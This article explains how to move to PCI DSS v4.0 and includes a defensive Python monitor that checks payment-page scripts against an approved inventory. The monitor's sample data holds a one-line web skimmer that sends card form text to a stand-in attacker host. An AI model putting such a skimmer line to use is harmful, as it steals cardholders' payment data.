PCI DSS Version 4.0 Published
With PCI DSS v4.0 released in March 2022, payment organizations must realign engineering roadmaps, update governance charters, and renegotiate supplier obligations so that security controls stay effective as assessment methods evolve.
Accuracy-reviewed by the editorial team
PCI DSS version 4.0, published March 31, 2022, raises the bar for payment security programs by emphasizing outcome-based controls, continuous monitoring, and layered defenses against emerging threats. Organizations may continue validating against v3.2.1 until it is retired on March 31, 2024, but boards, CISOs, and payment operations teams should launch coordinated initiatives now to adopt v4.0's changes, especially the customized approach, expanded multi-factor authentication requirements, targeted risk analyses, and new protections for e-commerce payment pages. The standard expects governance bodies to demonstrate accountability and adaptability as payment channels evolve.
Translate new requirements into actionable workstreams
The standard's structure remains familiar: 12 requirement families with detailed control statements, many of them clarified or expanded. Requirement 8 extends MFA to all access into the cardholder data environment, not only remote access and non-console administrative access as under v3.2.1; this is a future-dated requirement that becomes mandatory on March 31, 2025.
Requirement 6 adds secure software lifecycle expectations consistent with NIST and OWASP guidance and requires an inventory of every script loaded on payment pages, each with a written justification and a mechanism to confirm its integrity (6.4.3). Requirement 11 adds change- and tamper-detection for payment pages, alerting on unauthorized modification of the HTTP headers and script contents the consumer browser receives (11.6.1). Organizations must inventory which controls are effective immediately and which are future-dated best practices until March 31, 2025, and establish cross-functional workstreams covering identity and access management, application security, monitoring, network segmentation, and documentation.
Technology teams should analyze architecture diagrams for CDE scope, including hybrid cloud deployments and microservices. Where tokenization, network segmentation, or virtualization isolates cardholder data, verify that the controls still hold under v4.0. Update data flow diagrams and asset inventories to include serverless components, containerized workloads, and API gateways. Tune network security controls (firewalls, intrusion detection, WAFs) against account takeover, but recognize that they do not by themselves address Magecart-style web skimming: Requirement 11.6.1 is met by detecting unauthorized changes to payment pages as delivered to the browser, not by perimeter filtering.
Embed governance and accountability
Requirement 12.1 requires an information security policy that defines security roles and responsibilities for all personnel and formally assigns responsibility for information security to a knowledgeable member of executive management. Governance committees should revise charters to reflect v4.0, assign control owners, and define reporting cadence. Provide the board with a documented transition plan that includes budget allocations, staffing requirements, and dependencies on third parties. Incorporate PCI metrics into enterprise risk dashboards and ensure risk appetite statements address payment data breaches, downtime, and regulatory penalties.
Internal policies must be updated. Align information security policy suites, access management standards, and secure development policies with v4.0 terminology and control expectations. Update change management procedures to include verification of new controls, such as reviewing script approvals, documenting targeted risk analyses, and validating MFA coverage. Ensure policy updates are communicated to employees via training, attestation workflows, and awareness campaigns.
The customized approach lets entities design alternative controls when they can show that the control meets the requirement's stated objective. Set up a governance process for evaluating proposals: require a business justification, the targeted risk analysis and controls matrix the standard calls for, a testing plan, and approval by senior security leaders, and engage the QSA early, since the assessor must develop and document their own testing procedures for each customized control. Maintain repositories for customized control documentation and ensure change management applies when control designs evolve.
Operationalizing targeted risk analyses and continuous monitoring
Several requirements now allow a targeted risk analysis (TRA) to set how often a control is performed, and a documented TRA is required wherever an entity relies on that flexibility. Develop a TRA methodology aligned with ISO 31000 or NIST SP 800-30, incorporating threat intelligence, vulnerability data, business impact, and existing mitigations, and review each TRA at least annually. Train risk analysts and control owners on performing TRAs, documenting assumptions, and obtaining management sign-off. Integrate TRA outputs into GRC platforms so evidence is readily available for QSAs.
Continuous compliance demands richer telemetry. Build centralized logging architectures that aggregate data from on-premises and cloud systems, ensuring log integrity and retention meet Requirement 10. Implement security orchestration, automation, and response (SOAR) playbooks for common alerts, and document tuning decisions as part of compliance evidence. Expand vulnerability management to cover container images, infrastructure-as-code templates, and third-party components. Ensure penetration testing scopes include APIs, mobile applications, and cloud services, and coordinate with DevSecOps teams to remediate findings quickly.
Customer-facing payment pages need both an authorized script inventory (Requirement 6.4.3) and change- and tamper-detection (Requirement 11.6.1). Combine content security policies, subresource integrity attributes, and script monitoring to detect unauthorized scripts and unauthorized changes to script contents and HTTP headers, and run the detection at least once every seven days or at the frequency set by a targeted risk analysis. Establish approval workflows for third-party scripts, record each script's written justification and the reviews performed, and validate the controls in QA environments before production release. Combine monitoring with incident response drills covering web skimming scenarios.
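The following Python monitor is an added example, not code from the original article or from PCI SSC. It implements the check described above: it parses a payment page, compares every script against an authorized inventory keyed by URL (or position, for inline scripts) with subresource-integrity hashes, flags scripts that are unauthorized or whose content has drifted from the approved hash, and reports a missing Content-Security-Policy header. The hostnames, script bodies, inventory entries and HTTP headers are constructed for the demonstration, and the `fetch` callable stands in for an HTTPS GET of each external script.

```python
import base64
import hashlib
from html.parser import HTMLParser


def sri_hash(content: bytes, alg: str = "sha384") -> str:
    """Return the Subresource Integrity string for content, e.g. 'sha384-<base64 digest>'."""
    digest = hashlib.new(alg, content).digest()
    return f"{alg}-{base64.b64encode(digest).decode()}"


class ScriptCollector(HTMLParser):
    """Collect every <script> element: src and integrity attributes plus the inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            self._current = {"src": a.get("src"), "integrity": a.get("integrity"), "body": ""}

    def handle_data(self, data):
        if self._current is not None:
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def audit_payment_page(html, headers, fetch, inventory):
    """Compare the scripts delivered on a payment page with the authorized inventory.

    inventory maps a script key (its src URL, or 'inline#N' for the N-th inline script)
    to {"justification": ..., "sri": ...}. fetch(src) returns the bytes of an external
    script; a production monitor would GET it over HTTPS, the sample below supplies
    constructed bodies. Returns a list of (severity, message) findings.
    """
    findings = []
    collector = ScriptCollector()
    collector.feed(html)
    seen, inline_n = set(), 0
    for s in collector.scripts:
        if s["src"]:
            key, body = s["src"], fetch(s["src"])
        else:
            key, body = f"inline#{inline_n}", s["body"].encode()
            inline_n += 1
        seen.add(key)
        entry = inventory.get(key)
        if entry is None:
            # Anything absent from the inventory is unauthorized by definition (Req. 6.4.3).
            findings.append(("HIGH", f"unauthorized script not in inventory: {key}"))
            continue
        actual = sri_hash(body)
        if actual != entry["sri"]:
            # Content drift on an authorized script: the classic skimmer injection (Req. 11.6.1).
            findings.append(("HIGH", f"script content changed: {key} expected {entry['sri']} got {actual}"))
        if s["src"] and s["integrity"] != entry["sri"]:
            # Without a matching integrity attribute the browser will execute a modified file.
            findings.append(("MEDIUM", f"integrity attribute missing or stale on {key}"))
    for key in inventory.keys() - seen:
        findings.append(("LOW", f"inventoried script no longer on page: {key}"))
    # 11.6.1 covers HTTP headers too; CSP is the header that restricts where scripts may load from.
    if "content-security-policy" not in {k.lower() for k in headers}:
        findings.append(("MEDIUM", "Content-Security-Policy header absent"))
    return findings


# --- Constructed sample (hypothetical merchant and PSP hostnames, not real sites) ---
GOOD_CHECKOUT_JS = b"window.PSP={tokenize:function(pan){return fetch('/tok',{method:'POST',body:pan});}};"
INLINE_CONFIG = 'window.checkoutConfig={currency:"USD"};'
CHECKOUT_SRC = "https://cdn.example-psp.test/checkout.js"
ANALYTICS_SRC = "https://static.example-merchant.test/analytics.js"

# The 6.4.3 inventory: each authorized script with its written justification and approved hash.
INVENTORY = {
    CHECKOUT_SRC: {"justification": "PSP hosted-field tokenization library", "sri": sri_hash(GOOD_CHECKOUT_JS)},
    "inline#0": {"justification": "Checkout configuration emitted by the platform", "sri": sri_hash(INLINE_CONFIG.encode())},
}

# The page as fetched today: the authorized PSP script, an analytics tag nobody approved, the inline config.
PAGE_HTML = (
    "<html><head>"
    f'<script src="{CHECKOUT_SRC}" integrity="{INVENTORY[CHECKOUT_SRC]["sri"]}" crossorigin="anonymous"></script>'
    f'<script src="{ANALYTICS_SRC}"></script>'
    f"<script>{INLINE_CONFIG}</script>"
    '</head><body><form id="card"></form></body></html>'
)
# The CDN copy of checkout.js now carries a skimmer appended to the authorized code.
SKIMMED_CHECKOUT_JS = GOOD_CHECKOUT_JS + b"new Image().src='https://collect.example-evil.test/?d='+btoa(document.forms.card.innerText);"
FETCHED = {CHECKOUT_SRC: SKIMMED_CHECKOUT_JS, ANALYTICS_SRC: b"/* unreviewed third-party tag */"}
HEADERS = {"Content-Type": "text/html", "Strict-Transport-Security": "max-age=31536000"}


def run_sample():
    return audit_payment_page(PAGE_HTML, HEADERS, FETCHED.__getitem__, INVENTORY)


if __name__ == "__main__":
    for severity, message in run_sample():
        print(severity, message)
```

On the constructed page the monitor reports the modified checkout.js, the unapproved analytics tag, and the absent CSP header. Note that a browser honouring the `integrity` attribute would already refuse to run the skimmed checkout.js, which is the defensive value of SRI; the monitor still reports the drift so the team learns that the CDN copy changed, and the inventory's justification field is the evidence an assessor asks for under 6.4.3. Schedule the run at least weekly, or at the interval your targeted risk analysis sets, and keep the findings as 11.6.1 evidence.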
Implications for service providers and outsourcing
Service providers face heightened expectations under v4.0, including semi-annual segmentation testing and detailed reporting to clients. Managed service providers, payment gateways, and cloud hosts should update responsibility matrices that outline which controls they manage and how customers can validate them. Provide customers with transparent documentation—SOC 2 reports, penetration test summaries, configuration baselines—and update attestation packages to reference new requirements.
Merchants must revisit contracts and service-level agreements to incorporate v4.0 obligations. Require suppliers to notify them of control failures, keep penetration testing current, and participate in coordinated incident response exercises. Implement supplier scorecards tracking v4.0 readiness, including MFA coverage, logging practices, and segmentation controls. Where suppliers rely on the customized approach, ensure they provide sufficient evidence for QSAs to validate that the control objectives are met.
For organizations consuming software-as-a-service or platform services, verify how cardholder data is processed, stored, or transmitted. Demand architecture diagrams and data flow descriptions that clarify scope. Evaluate whether tokenization or point-to-point encryption (P2PE) solutions need upgrades to align with v4.0. Maintain contingency plans if suppliers cannot meet timelines, including alternative providers or internalization strategies.
Training, culture, and change management
PCI DSS 4.0 expands Requirement 12.6 on security awareness training to address evolving threats such as phishing and social engineering. Update curricula to include social engineering tactics targeting payment staff, secure coding practices for React/Angular single-page applications, and procedures for managing customized controls. Track training completion and effectiveness through assessments and simulated phishing campaigns.
Communicate changes to frontline employees—call center staff, retail associates, developers—so they understand new MFA processes, access restrictions, and escalation paths. Provide job aids for handling cardholder data in remote or hybrid work scenarios, including secure workspace guidelines, device hardening, and incident reporting. Engage HR and communications teams to reinforce accountability and celebrate milestones achieved in the transition.
Assessment readiness and documentation
Prepare for assessments by organizing evidence around the new requirement structure. Update control narratives, diagrams, and inventories within GRC systems. Conduct internal assessments mirroring QSA procedures, including sampling, interviews, and control testing. Document compensating controls where full compliance is not yet achievable, ensuring they meet the standard's criteria: a legitimate technical or documented business constraint, sufficient rigor to meet the original requirement's intent and provide a similar level of defense, protection that goes above and beyond other PCI DSS requirements, and validation during each assessment.
Plan for future-dated requirements by setting interim checkpoints. For example, schedule completion of MFA expansion and script monitoring well before the March 31, 2025 deadline, leaving time for remediation and reassessment. Maintain issue logs that track owner, severity, action plan, and due dates. Report progress to executive leadership monthly, highlighting dependencies on budget, staffing, or vendor deliverables.
By embedding PCI DSS 4.0 into enterprise risk management, aligning governance structures, and cultivating trusted supplier relationships, organizations can transition smoothly from v3.2.1 while elevating their overall security posture. Early investment in targeted risk analysis, customized control design, and continuous monitoring will reduce last-minute compliance scrambling and strengthen protection of payment data.